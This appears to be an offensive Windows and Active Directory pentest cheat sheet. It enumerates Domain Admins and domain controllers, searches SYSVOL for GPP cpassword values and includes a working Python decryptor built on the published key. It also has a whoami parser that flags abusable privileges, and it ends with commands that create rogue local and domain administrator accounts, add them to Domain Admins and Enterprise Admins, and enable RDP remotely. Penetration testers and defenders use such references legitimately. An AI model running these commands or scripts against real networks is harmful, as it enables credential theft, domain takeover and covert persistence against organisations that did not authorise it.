net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
runas /netonly /user:<DOMAIN>\<USER> cmd.exe
With /netonly the supplied credentials are used only for network authentication (the local process still runs as the current user), which is why it also works from a machine that is not joined to the domain.
Use the /profile flag to run cmd.exe explicitly in the context of the user, with that user's profile loaded, on a domain-joined system:
runas /profile /user:<DOMAIN>\<USER> cmd.exe
Or start an elevated prompt from CMD / PowerShell (this triggers a UAC prompt, and the new process gets the full high-integrity administrator token instead of the filtered one):
powershell -Command "Start-Process cmd -Verb RunAs"
subst z: c:\
findstr /s /n /i /p cpassword \\<DOMAIN>\sysvol\*
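The findstr above only locates the cpassword attribute in Group Policy Preference files (Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml). The value is AES-256-CBC encrypted with a key Microsoft published in MS-GPPREF, so anyone who can read SYSVOL can decrypt it offline; MS14-025 stopped new passwords from being written, but old files stay in SYSVOL until someone removes them. The following is an added example, not code from the page: a Python script that walks one preference XML file, pulls every cpassword together with the account it belongs to, and decrypts it. It needs the `cryptography` package (or pycryptodome as a fallback); the Groups.xml below is constructed, and the cpassword in it is the public test vector shipped with the gpp-decrypt tool.

```python
import base64
import xml.etree.ElementTree as ET

# AES-256 key Microsoft published in MS-GPPREF section 2.2.1.1.4. Because the
# key is public, any cpassword readable from SYSVOL is effectively plaintext.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)
GPP_AES_IV = bytes(16)  # all-zero IV

# Attribute that carries the account name differs per preference file type
# (Groups.xml: userName, Services.xml: accountName, ScheduledTasks.xml: runAs,
# DataSources.xml: username).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def _aes_cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Raw AES-CBC decryption (no padding removal) via 'cryptography' or pycryptodome."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        return dec.update(data) + dec.finalize()
    except ImportError:
        from Crypto.Cipher import AES  # pycryptodome fallback
        return AES.new(key, AES.MODE_CBC, iv).decrypt(data)


def gpp_decrypt(cpassword: str) -> str:
    """Turn a GPP cpassword attribute value into the clear-text password."""
    # GPP strips the base64 '=' padding; restore it before decoding.
    padded = cpassword + "=" * (-len(cpassword) % 4)
    raw = base64.b64decode(padded)
    if len(raw) % 16:
        raise ValueError("ciphertext is not a whole number of AES blocks")
    plain = _aes_cbc_decrypt(GPP_AES_KEY, GPP_AES_IV, raw)
    pad = plain[-1]  # PKCS#7 padding
    if not 1 <= pad <= 16 or plain[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding, not a cpassword value?")
    return plain[:-pad].decode("utf-16-le")  # GPP stores the password as UTF-16LE


def find_cpasswords(xml_text: str) -> list:
    """Walk a preference XML file and return every cpassword with its account and plaintext."""
    hits = []
    for elem in ET.fromstring(xml_text).iter():
        cpass = elem.get("cpassword")
        if cpass is None:
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), None)
        hits.append({"account": account, "cpassword": cpass, "password": gpp_decrypt(cpass)})
    return hits


# Constructed Groups.xml in the shape of a SYSVOL preference file (not a real
# capture); the cpassword is the public gpp-decrypt test vector.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="Administrator (built-in)" image="2" changed="2015-02-18 01:53:01">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
        changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
        userName="Administrator (built-in)"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    for hit in find_cpasswords(SAMPLE_GROUPS_XML):
        print(f"{hit['account']}: {hit['password']}")
```

In practice you feed find_cpasswords() the contents of each XML file that the findstr hit returned; the same function works for every preference type because it keys on the cpassword attribute rather than on the element name.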
$ whoami /all

USER INFORMATION
----------------

User Name    SID
============ =============================================
win10\johndo S-1-5-21-4192065701-4228146649-662612674-1001

GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON                         Well-known group S-1-5-14     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
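Reading the output above: BUILTIN\Administrators and S-1-5-114 are marked "Group used for deny only", so johndo is a local administrator but this shell holds the UAC-filtered, medium-integrity token, and none of the five privileges is worth anything until you elevate. The following is an added example, not code from the page: a Python triage script that parses whoami /all output and reports exactly that (admin, filtered admin, integrity level) plus any privilege from a list of commonly abused ones. The first sample is the page's own output, abridged; the second, a service account with SeImpersonatePrivilege, is constructed. The privilege list is this example's own choice.

```python
import re

# Privileges that are routinely abused for SYSTEM or arbitrary file access.
# This list is the example's own choice, not something the page states.
ABUSABLE_PRIVILEGES = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeDebugPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege", "SeTcbPrivilege", "SeCreateTokenPrivilege",
}

_USER_RE = re.compile(r"^(?P<user>[^\s\\]+\\[^\s\\]+)\s+(?P<sid>S-1-5-21-[\d-]+)\s*$")
_GROUP_RE = re.compile(
    r"^(?P<name>.+?)\s+(?P<type>Well-known group|Alias|Group|Label)\s+"
    r"(?P<sid>S-1-[\d-]+)\s*(?P<attrs>.*?)\s*$"
)
_PRIV_RE = re.compile(r"^(?P<name>Se\w+Privilege)\s+.+?\s+(?P<state>Enabled|Disabled)\s*$")


def parse_whoami(text: str) -> dict:
    """Parse 'whoami /all' output; tolerates aligned columns and collapsed spacing."""
    info = {"user": None, "sid": None, "groups": [], "privileges": {}}
    for raw in text.splitlines():
        line = raw.strip()
        if m := _USER_RE.match(line):
            info["user"], info["sid"] = m["user"], m["sid"]
        elif m := _GROUP_RE.match(line):
            info["groups"].append((m["name"], m["sid"], m["attrs"]))
        elif m := _PRIV_RE.match(line):
            info["privileges"][m["name"]] = m["state"]
    return info


def assess(info: dict) -> dict:
    """Answer the first questions a pentester asks about a token."""
    admins = [attrs for _, sid, attrs in info["groups"] if sid == "S-1-5-32-544"]
    # "Group used for deny only" on BUILTIN\Administrators means the account is a
    # local admin but this process holds the UAC-filtered (medium) token.
    full_admin = any("Enabled group" in a for a in admins)
    filtered_admin = bool(admins) and not full_admin
    integrity = next(
        (name.split("\\", 1)[1].replace(" Mandatory Level", "")
         for name, sid, _ in info["groups"] if sid.startswith("S-1-16-")),
        None,
    )
    # A "Disabled" privilege is still present in the token and can be switched on
    # with AdjustTokenPrivileges, so it is reported regardless of state.
    abusable = sorted(p for p in info["privileges"] if p in ABUSABLE_PRIVILEGES)
    return {"user": info["user"], "integrity": integrity, "admin": full_admin,
            "filtered_admin": filtered_admin, "abusable_privileges": abusable}


# The page's own whoami /all output, abridged to the lines that matter.
SAMPLE_FILTERED = r"""
USER INFORMATION
User Name    SID
win10\johndo S-1-5-21-4192065701-4228146649-662612674-1001
GROUP INFORMATION
Group Name                                                    Type             SID          Attributes
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192
PRIVILEGES INFORMATION
Privilege Name                Description                          State
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
"""

# Constructed output (not from the page) for a service account: high integrity
# and SeImpersonatePrivilege, the usual starting point for a SYSTEM escalation.
SAMPLE_SERVICE = r"""
USER INFORMATION
User Name    SID
corp\svc_web S-1-5-21-1111111111-2222222222-3333333333-1105
GROUP INFORMATION
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288
PRIVILEGES INFORMATION
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

if __name__ == "__main__":
    for sample in (SAMPLE_FILTERED, SAMPLE_SERVICE):
        print(assess(parse_whoami(sample)))
```

On a live host, pipe the real command into it (whoami /all > token.txt, then parse_whoami(open("token.txt").read())); the regexes key on the SID and attribute columns rather than on column positions, so locale-independent fields such as SIDs still parse even when the column widths change.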
$ nltest /dclist:offsec.nl
Get list of DCs in domain 'offsec.nl' from '\\DC2016.offsec.nl'.
DC2008R2.offsec.nl [PDC] [DS] Site: Default-First-Site-Name
DC2016.offsec.nl [DS] Site: Default-First-Site-Name
DC2019.offsec.nl [DS] Site: Default-First-Site-Name
The command completed successfully
Local admin rights are required to add a local user:
net user <USER> LetMeIn123! /add /active:yes
You can enable Remote Desktop (RDP), also on a remote system, by setting the fDenyTSConnections registry value. Tip: use ‘smbexec.py’ / ‘wmiexec.py’ (Impacket) to run the command on a remote system where RDP is not enabled yet, or use the CrackMapExec rdp module (see CrackMapExec). Note that the Windows Firewall "Remote Desktop" rule group must also allow inbound TCP 3389, and the account you connect with has to be a member of Administrators or Remote Desktop Users.
Enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Disable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
Creation of the local user ‘NewLAForMe’ (/Y answers the confirmation prompt, e.g. the warning about passwords longer than 14 characters) - net user NewLAForMe "NotThatStrongPassword@" /add /Y
Adding the user to the local Administrators group - net localgroup Administrators NewLAForMe /add
Creation of the domain user ‘NewDAForMe’ (/domain performs the operation on the primary domain controller and requires rights to create domain accounts) - net user NewDAForMe "NotThatStrongPassword@" /add /domain /Y
Adding the user to the Domain Admins group - net group "Domain Admins" NewDAForMe /add /domain
or to Enterprise Admins (this group only exists in the forest root domain) - net group "Enterprise Admins" NewDAForMe /add /domain
Set user status to active - net user NewDAForMe /active:yes /domain
Set the account expiry date - net user NewDAForMe /expires:07/19/23 /domain